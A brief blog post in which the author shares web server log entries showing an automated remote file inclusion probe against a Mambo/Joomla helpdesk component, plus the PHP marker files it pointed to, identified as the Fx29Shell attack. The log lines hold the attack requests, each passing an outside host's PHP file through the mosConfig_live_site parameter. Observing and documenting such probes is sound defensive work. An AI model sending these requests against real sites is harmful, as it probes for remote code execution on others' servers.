2010-03-04 4 months ago
Writing about security on your website has this interesting effect in the logs:200.93.147.154 - - [04/Mar/2010:09:58:35 +0100] "GET /~koos/newstag.cgi/security/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" 200.93.147.154 - - [04/Mar/2010:09:58:35 +0100] "GET /~koos/newstag.cgi/security%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" 200.93.147.154 - - [04/Mar/2010:09:58:41 +0100] "GET /~koos/newstag.cgi/security%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0"The content of heheh.txt is predictable:<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>By pure coincidence there is a file http://zerozon.co.kr/data/eeng/id1.txt with the contents:<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>And that all looks very familiar: Fx29Shell php attack. This won't keep me from writing about security or amusing myself by browsing the logfiles. Maybe I'll find a fresh attack. This automated one is getting really boring.
